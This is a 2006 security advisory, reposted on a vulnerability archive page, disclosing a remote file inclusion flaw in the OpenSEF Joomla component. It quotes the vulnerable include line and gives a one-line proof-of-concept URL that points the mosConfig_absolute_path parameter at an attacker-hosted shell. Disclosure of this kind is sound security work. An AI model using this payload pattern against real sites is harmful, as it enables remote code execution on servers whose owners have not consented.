Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:21.08.2006
Subject:Modification For OpenSEF Remote file Inclusion

               ##################################################################
#########################
               #                       Aria-Security.net Advisory                                        #
               #                       Discovered  by: O.U.T.L.A.W                                       #                     #                       < www.Aria-security.net >                                         #
               #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
               #                                                                                  
       #
               ##################################################################
#########################


#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)
#Source:
  
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
 } else {
   // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
   //


*********************************************************************************
***

                                                                                 
        
#Proof of Concept:                                                                        
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#                                                         
#----------------------------------------------------------                               
#                                                                                  
                                                                                 
      
#                                                                                  
               
#Contact : Outlaw@aria-security.net                                                       
                                                                                 
       

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server